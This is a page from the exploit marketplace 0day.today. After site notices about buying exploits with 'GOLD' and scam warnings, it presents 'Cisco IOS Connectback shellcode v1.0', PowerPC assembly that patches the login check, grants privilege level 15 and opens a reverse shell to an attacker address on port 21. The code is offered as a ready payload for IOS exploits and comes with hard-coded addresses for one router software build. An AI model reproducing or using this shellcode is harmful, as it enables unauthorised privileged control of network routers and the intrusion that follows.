0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Cisco IOS Connectback shellcode v1.0
==================================== Cisco IOS Connectback shellcode v1.0 ==================================== # ---------------------------------------------------------------------------------------- # # Cisco IOS Connectback shellcode v1.0 # (c) 2007 IRM Plc # By Gyan Chawdhary # # ---------------------------------------------------------------------------------------- # # The code creates a new TTY, allocates a shell with privilege level 15 and connects back # on port 21 # # This shellcode can be used as the payload for any IOS exploit on a PowerPC-based device. # # # The following five hard-coded addresses must be located for the target IOS version. # # The hard-coded addresses used here are for: # # IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE SOFTWARE (fc2) # # ---------------------------------------------------------------------------------------- .equ malloc, 0x804785CC .equ allocate_tty, 0x803d155c .equ ret, 0x804a42e8 .equ addr, 0x803c4ad8 .equ str, 0x81e270b4 .equ tcp_connect, 0x80567568 .equ tcp_execute_command, 0x8056c354 .equ login, 0x8359b1f4 .equ god, 0xff100000 .equ priv, 0x8359be64 # ---------------------------------------------------------------------------------------- main: stwu 1,-48(1) mflr 0 stw 31,44(1) stw 0,52(1) mr 31,1 li 3,512 lis 9,malloc@ha #malloc() memory for tcp structure la 9,malloc@l(9) mtctr 9 bctrl mr 0,3 stw 0,20(31) lwz 9,12(31) li 0,1 stb 0,0(9) lwz 9,12(31) lis 0,0xac1e # connect back ip address ori 0,0,1018 # stw 0,4(9) li 3,66 li 4,0 lis 9,allocate_tty@ha # allocate new TTY la 9,allocate_tty@l(9) mtctr 9 bctrl addi 0,31,24 # Fix TTY structure to enable level 15 shell without password # # ########################################################## # login patch begin lis 9, login@ha la 9, login@l(9) li 8,0 stw 8, 0(9) # login patch end #IDA placeholder for con0 # # lis %r9, ((stdio+0x10000)@h) # lwz %r9, stdio@l(%r9) # lwz %r0, 0xDE4(%r9) #priv struct # # priv patch begin lis 9, priv@ha la 9, priv@l(9) lis 8, god@ha la 8, god@l(8) stw 8, 0(9) # priv patch end ########################################################### li 3,0 li 4,21 # Port 21 for connectback lwz 5,12(31) li 6,0 li 7,0 mr 8,0 li 9,0 lis 11,tcp_connect@ha # Connect to attacker IP la 11,tcp_connect@l(11) mtctr 11 bctrl mr 0,3 stw 0,20(31) li 3,66 lwz 4,20(31) li 5,0 li 6,0 li 7,0 li 8,0 li 9,0 li 10,0 lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing connection, similar to /bin/bash la 11,tcp_execute_command@l(11) mtctr 11 bctrl lwz 11,0(1) lwz 0,4(11) mtlr 0 lwz 31,-4(11) mr 1,11 ########################################### lis 9, addr@ha addi 0, 9, addr@l mtctr 0 xor 3,3,3 addi 3,0, -2 lis 10, str@ha addi 4, 10, str@l bctrl lis 10, ret@ha addi 4, 10, ret@l mtctr 4 bctrl # 0day.today [2024-06-03] #